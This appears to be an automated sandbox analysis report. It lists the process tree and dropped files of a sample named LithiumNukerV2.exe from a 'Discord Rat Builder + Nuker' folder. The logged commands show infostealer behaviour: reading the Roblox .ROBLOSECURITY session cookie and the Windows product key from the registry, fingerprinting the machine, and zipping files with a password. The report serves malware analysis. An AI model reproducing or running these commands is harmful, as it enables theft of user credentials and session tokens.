C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4416"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 44164⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2032"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 20324⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2528"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 25284⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4536"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 45364⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4936"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 49364⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5200"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 52004⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5208"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 52084⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5292"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 52924⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5300"3⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 53004⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵
-
C:\Windows\system32\getmac.exegetmac4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI51882\rar.exe a -r -hp"ASTR0" "C:\Users\Admin\AppData\Local\Temp\GXlfp.zip" *"3⤵
-
C:\Users\Admin\AppData\Local\Temp\_MEI51882\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI51882\rar.exe a -r -hp"ASTR0" "C:\Users\Admin\AppData\Local\Temp\GXlfp.zip" *4⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\LithiumNukerV2\LithiumNukerV2.exe"C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\LithiumNukerV2\LithiumNukerV2.exe"1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9926546f8,0x7ff992654708,0x7ff9926547182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2336 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4064 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4064 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5768 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,6773453377428839452,13349293383193312383,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6384 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\LithiumNukerV2\LithiumNukerV2.exe"C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\LithiumNukerV2\LithiumNukerV2.exe"1⤵
-
C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\LithiumNukerV2\LithiumNukerV2.exe"C:\Users\Admin\Downloads\Discord Rat Builder + Nuker\Discord Rat Builder + Nuker\LithiumNukerV2\LithiumNukerV2.exe"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5537815e7cc5c694912ac0308147852e4
SHA12ccdd9d9dc637db5462fe8119c0df261146c363c
SHA256b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f
SHA51263969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD58b167567021ccb1a9fdf073fa9112ef0
SHA13baf293fbfaa7c1e7cdacb5f2975737f4ef69898
SHA25626764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513
SHA512726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5ddb853b7697db9541edca96c613ee2e7
SHA1ff55b9e47b5163c3b85ece139f96f3f94979ed54
SHA2561c84bcb67ccef5e0d47438167b7b40b8b2fa5f0d75997b847e960a73d529f428
SHA512fecf84da84b86e1d544f1b019c9696aa9ab97bc1e2a5002d1f71b3b22871cc4651b8a2c5339388015237aabb06fa801be1d13a3ca0ce171e0cb99b9826925bcf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5fc403bc54f7521ef762822e0571ec3ec
SHA1fcf5916855a7cc0139d8e13488e43971a4f9f196
SHA256dfb36ea693437ce5abfe919842003ec2fafde1e61b5c8d4c51423bce4b839392
SHA5120427e479e9026f215e4a77b389b6951743f1cd2e0c45cf7d0947857ff1f060e9eb6f66a4e687b00d54b5c1a390a53776456dac173414650cefadd527bc8fc7f1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011Filesize
17KB
MD5868f1c2cbe6f6335e9526108b93b85ea
SHA1ab894b8655b55724140516c9717ec90134186bbc
SHA2560e993dfb76c08813b09f952cc2fe16a3b32caf5ca333093a88c231e09944584f
SHA51221d76233f7fadfaf838f9cd18caf341986fc0bcd81e3135e9c6a5efbc0790173b55166ce04e26de4190d981f557a690d1a1352bd1d0d2e191912b7903802403c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012Filesize
19KB
MD51972b3df4ebb295fcc3ff76696ded3c3
SHA19c61bb9965b82391685b64631e8622e3fa94d82b
SHA2560e99d08426be6356e9a025a6d8b0864ce4f2f1f2ef77739c5cc675481ecddfc4
SHA512b6327f004952d250164de4220629b6e0837af30a210b19a46e802d6f749b8af5e3385295ea52315f0f6a8620cfe1b330742ce97fdc87321d8777e217aa27e7ff
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013Filesize
16KB
MD522026eb00d2d70eeb63cbe14d75f8355
SHA15d1cabc0387f4eccaef9baee4f4237c57eea15fe
SHA25674216ef799be77d9538ee3c99daa11dd18fa6cbaa5c2034dcf9b758c98d0f284
SHA512d0cd848ecce7fb3d207adbcaf67e65b090c5ad8132da4b745683180fa7a571573866bac6371c9d7b27cf69d53d5820861059399f2f52491af9fe2e6eee8af188
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014Filesize
17KB
MD5c0a5a0e67eb1daf568e7cd375c40d2aa
SHA1a65f3df46a42a0c58c3edd06c11d86e374de4384
SHA2564c9d7b64f6e39ac78b21f19dc5b4b669141729a5ab78ffc7a0a53506e35a8cdd
SHA5127705d43dee52fedfd5b68407a861252debeb8107d24eeb842880c771b4215f0504b6eeb00838a7cf1948dee3d1d9d65d91798fda2f2650a105760c592373f6cc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015Filesize
17KB
MD5fb5a5952be07c7caea3f3ba4b93a2634
SHA19c8c8324dca4190d0acaebcdda03d99eee2599fa
SHA256b86105cdb2f03d802b69e0eb735a73a67621f6160218c7de483a84e6d7dfaabd
SHA5121f4edab4415f82268a40d0ead26db7c7083d131b933f5d43ea5928967386e7e9e7b954c95b88e45911a3a3ac6c965ef7765921103bf7ed5571604c3748882b14
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016Filesize
17KB
MD58b4c25adad144b4e4de96b2e2e783890
SHA132448f5fa6d6c617a7181c27d34c0d455bc407e1
SHA256fa753e2c8392c0fda3779ec04d159c2ecf7001d2e8df3a878b6c5f28cc76ce54
SHA512dc359eae665e1f9c08cfcf31bfea409a36f1ae458d6cf526a04104265fdc5077a261841cbb4b965232463461013a25ccc77d608949c0dfaa4d11d2999dbaa58c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD5b482adacaad996dd3c2a4bb3cf9f0654
SHA17c2a43cf3c7e762c03d6780df1fba6a4b8bcaf88
SHA256ba8a60207dc63ed5174931aca3524cd5a7948a970ba4676c5b1a5101530e921d
SHA512806dca4cf883cc88bf60a57ed54bc141eb0eea7e9cf9f90d52c258670c324b01bd40c97ff3f61bc136e90aaa609d15258e8d2789e48e9140e821e604545874b6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD54da8dd40d7894fb509f0dd704704990c
SHA10a0a95bd525aa9ebea25f32328bded14f9e2b7af
SHA256a87e960a41d52a5bedab10e201419cb902fbd5c8f291752dbf9b2a165fb2a5ef
SHA512f4f440b001a48454bed541653684881e3d63645b3b78a41d995ea6a7be5b78e0670efa13c6d695ed5b79af83a0d1f7925ff8626b253f5826bdf90b60df293441
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD577a132e89a61fc18d58584663b9a8ec6
SHA1309c8a6d82c50977c584bba0682667be82c065a1
SHA2563a02737ec8f8bb37612edee135c2ae07b15125251a1420489977f90892702bfa
SHA512147864eddaede4ccd400c845b51e8341d8bf6c95c4ca6edd4781777007689140c4ad191197096dffc474a1e86d071c99c4bfdb607d08e361d70750033d82631e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\CookiesFilesize
20KB
MD5f9af45353342bf6de42ef20b44f98ab7
SHA1dbaf001b1aa18b881ce99eb0c9504dc0deda8137
SHA256b436052c9e464dca42bb3a8200a9f1d4b792c80878643736d4567e9b9d38c6c9
SHA51242780213805d1d7337fe386dffda741d0659b1df5e21bc895cc15951202e3247bf3fd43cc31f6cd866e06d7dcfce2ec6e9f5a84dddae01f70beceeefd4f1c438
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HistoryFilesize
124KB
MD52bd1b90f3837c9d7337e0a4047d5c53a
SHA1172e67125975c5816b5760ed26d6cbb5605832f4
SHA2561af95fb52ad7d6a24adb17c31146c4a6e63c100f0b75b8a3acd07bc142c3fd8f
SHA512e1a8f0cd8260369f6a50e47070d42d334fff673537afa2c950046f7907173bab92ed7b2d60bf314c8bfc905f2b52219bb4b8e444bad8c5539a209fa23020b1ee
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.logFilesize
13KB
MD550a608b8935f8961428781f4c1b76ae5
SHA134317784a3314ae7d7385648e9e43a5a907f5a0e
SHA25615b635cb6fab600cd3e7753485262703644d7837c1efd68196e32f2ae098719d
SHA5124857d49300d694fe7a66bcbec444560748da23800eb4efe51af06f2f79ab7c13cc176e809bc17d8070627ea972df1e592c1a59ad010f20a79958fa01fbc79e2a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
523B
MD59436bf93ffdacd77d08d430b61c3714d
SHA1cc92e705b32419f0529e30bf5af408db57fc02d2
SHA2561baf215e8586eb1a24369b65fdd162bd5b19e10e710447fef17c7eb3cd707e85
SHA512ecbdbaabd6cabe0bf4fe24263eafc2e8870222658962dd38f99b31c69ae88bd946516408d2d0990673d32d3a58bc652fca237c7477c3f714ca5436757dfe9b71
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD570cd9138727b78a0716f0ecc9b35b0fe
SHA177cb5339b122d000a14b554d76db00b7e0890351
SHA256d3e418499a972a082cc319c856e06ab73cd2f8bcce56af9afecb1f550adeb416
SHA512ebfcfdf9dee043e6f02239c7477b68cf49b3e4403be7e5324168ab0c4303899580235e66e9da57175f2783cbb61c788fca5fc0606e8a3b7dc726895cea35adf1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5e7e9bbf35411261359598abeb126cfc2
SHA151fc73c9cd9e683d46713fa784ca80d7ba900769
SHA256df176c1b7fed7c7c14cabdaf8146dfeb3b9d05d08fdeeb63fd96222dba960faa
SHA5125fc54a0a35f45e4fc91a8898262d4ce36df484cffdbe0c0ca3fd5e415b41ef46c52a0c9e0ed021d9c62163c25c081cafc8ee354078052ec4accb6ce35b9655c7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5b4f514c7f8778365f3af18889fb249ff
SHA1c9d0e071e59ca9cbf5e85cf51495d3dea10b6394
SHA25661921b17c8856c6348f3a131fa1958d903a60d4bae9e17d81347a219a69323c0
SHA51257ed50bfcc5efb9b626631c35247f6a2143f6d0395dd2062af83312db0d2236f400a51fa25f6330f60cdb321273e2127e8d3c0b31f51a4e484343f290cfe00f0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD570e14c813e7fdcf92b19028ebe1f9369
SHA1fcbc0b238d5453bc5ca7661175e3a2383cd14ec7
SHA256d460c8937f092fcfd253740baaf25953fe0a75f607d0a0c5f5ee00b070a00217
SHA512c9933df20028dd731824e2d966ddda0116bcb917dd13502219ef331fd12367cb21f2d38c477c74dd9160d4e5d06a4b3f9d5d1bd9753d9dc9612088788a6282a1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5f10677667ae7f07df2ff9e4890701ddb
SHA1c82d546152d9d56211f53e16c0d9daa1798d3b8f
SHA2565c5ff7e0f807e28f334ff81af6de2a4208bdebbc209a82133431e77c6f1db995
SHA512c1ba0414ca11e596c803ccea82c4f768d418093d6bfc2bf2ffcaf54e89ad87c281510fd39d5c9f59af1ff34ed9d4087f3055f85559732aba53355088ca590d2e
-
